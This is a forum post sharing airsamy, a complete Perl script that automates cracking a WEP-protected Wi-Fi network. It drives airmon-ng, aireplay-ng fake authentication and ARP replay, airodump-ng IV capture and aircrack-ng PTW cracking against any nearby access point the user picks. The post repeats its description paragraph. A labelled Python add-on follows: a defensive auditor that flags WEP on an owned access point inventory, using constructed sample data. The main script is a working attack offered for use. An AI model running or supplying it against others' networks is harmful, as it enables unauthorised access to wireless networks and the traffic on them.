AirSamy [Script]

Posted by D3M0N, June 21, 2011, 11:45:01 AM


D3M0N

Quote from: Samy Kamkar

airsamy provides a simple interface to quickly and automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack.

airsamy provides a simple interface to quickly and automatically crack a WEP network in a matter of minutes. It shows a list of available WEP networks and, once one is selected, it automatically puts the driver into monitor mode, tests packet injection, fake-authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack.

Code:
#!/usr/bin/perl
use strict;

my $interface = shift || "wlan0";
my $airmon    = "airmon-ng";
my $aireplay  = "aireplay-ng";
my $aircrack  = "aircrack-ng";
my $airodump  = "airodump-ng";

# stop + start interface
system($airmon, "start", $interface);

print "Please find an AP to use. When found, hit CTRL+C.\n";
print "[remember part of the name or part of BSSID]\n";

# tmpfile for ap output
my $tmpfile = "/tmp/airsamy" . rand();
unlink(glob("$tmpfile*"));

# show user APs
eval {
    local $SIG{INT} = sub { die };
    open(DUMP, "$airodump --output-format csv -w $tmpfile $interface|") || die "Can't run airodump ($airodump): $!";
};
close(DUMP);

# read in APs
my %aps;
my ($tmpfile1) = glob("$tmpfile*");
open(APS, "<$tmpfile1") || die "Can't read tmp file $tmpfile1: $!";
while (<APS>)
{
    chomp;
    s/://g;
    s/\s+/ /g;
    $aps{$_} = 1;
}
close(APS);
unlink($tmpfile1);

# ask for AP
my ($input, $ap);
while (!$ap)
{
    my $found = 0;
    print "\nPlease enter part of the name/bssid of the AP: ";
    chomp($input = <STDIN>);
    $input =~ s/://g;
    print "\n";

    foreach my $tmpap (keys %aps)
    {
        my @data = split(/\s*,\s+/, $tmpap);
        if ($tmpap =~ /$input/i)
        {
            print "Found: $data[0] ($data[13]) ch=$data[3] mb=$data[4] enc=$data[5] $data[6] $data[7]";
            if ($data[5] !~ /WEP/)
            {
                print " -- NOT WEP!";
            }
            else
            {
                $found++;
                $ap = $tmpap;
            }
            print "\n";
        }
    }

    if ($found > 1)
    {
        $ap = undef;
        print "\nPlease be more specific.\n\n";
    }
}

# get ap info
my @data = split(/\s*,\s+/, $ap);
my ($bssid, $essid, $chan) = ($data[0], $data[13], $data[3]);

# start on channel
system($airmon, "start", $interface, $chan);

# test injection
system($aireplay, "-9", "-e", $essid, "-a", $bssid, $interface);

# fake auth with the AP
system($aireplay, "-1", "0", "-e", $essid, "-a", $bssid, $interface);

# fork off, capture IVs in front
if (fork())
{
    # capture IVs
    system($airodump, "-c", $chan, "--bssid", $bssid, "-w", $tmpfile, $interface);

    # crack!
    #system($aircrack, "-z", glob("$tmpfile*cap"));

    # remove extra files
    unlink(glob("$tmpfile*"));
}
# do background stuff to produce packets
else
{
    sleep(1);

    # crack until we find something
    if (fork())
    {
        my ($key);
        while (!$key)
        {
            open(CRACK, "$aircrack -z " . join(" ", glob("$tmpfile*cap")) . "|");
            while (<CRACK>)
            {
                if (/correctly:\s*100%/)
                {
                    $key = 1;
                    close(CRACK);
                }
            }
        }
        system("killall", "-9", $aireplay, $airodump);
        system($aircrack, "-z", glob("$tmpfile*cap"));
    }
    # inject arps
    else
    {
        # capture an ARP and replay
        system($aireplay, "-3", "-b", $bssid, $interface);
    }
}


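A defensive counterpart to the workflow in this post, as an added example that is not part of the original post or of airsamy: it reads airodump-ng CSV output (the columns the script indexes as $data[0], $data[5] and $data[13]) and reports which access points from your own inventory still advertise WEP and so need migrating to WPA2/WPA3. The sample capture and the MANAGED_BSSIDS inventory are constructed for illustration.

```python
import csv
import io

# Constructed sample in the airodump-ng CSV layout: AP section, blank line, station section.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-06-21 11:00:00, 2011-06-21 11:05:00, 6, 54, WEP, WEP, , -40, 120, 35, 0. 0. 0. 0, 9, office-ap,
00:11:22:33:44:66, 2011-06-21 11:00:00, 2011-06-21 11:05:00, 11, 54, WPA2, CCMP, PSK, -52, 118, 0, 0. 0. 0. 0, 8, guest-ap,
66:77:88:99:AA:BB, 2011-06-21 11:00:00, 2011-06-21 11:05:00, 1, 54, WEP, WEP, , -70, 90, 2, 0. 0. 0. 0, 8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2011-06-21 11:01:00, 2011-06-21 11:04:00, -45, 40, 00:11:22:33:44:55, office-ap
"""

# Hypothetical inventory of access points the auditor administers.
MANAGED_BSSIDS = {"00:11:22:33:44:55", "00:11:22:33:44:66"}


def parse_access_points(text):
    """Return one dict per AP row; stop at the blank line before the station section."""
    header = None
    aps = []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        fields = [f.strip() for f in row]
        if not any(fields):
            if header:
                break       # blank line after the AP rows ends the section
            continue        # blank line before the header
        if header is None:
            header = fields
            continue
        if len(fields) < len(header):
            continue        # truncated row, e.g. capture stopped mid-write
        aps.append(dict(zip(header, fields)))
    return aps


def managed_wep_aps(text, managed):
    """APs from the inventory whose Privacy column still advertises WEP."""
    managed = {b.upper() for b in managed}
    return [ap for ap in parse_access_points(text)
            if ap["BSSID"].upper() in managed
            and "WEP" in ap["Privacy"].upper().split()]


if __name__ == "__main__":
    for ap in managed_wep_aps(SAMPLE_CSV, MANAGED_BSSIDS):
        print(f"{ap['BSSID']} ({ap['ESSID']}) ch={ap['channel']} still uses WEP")
```
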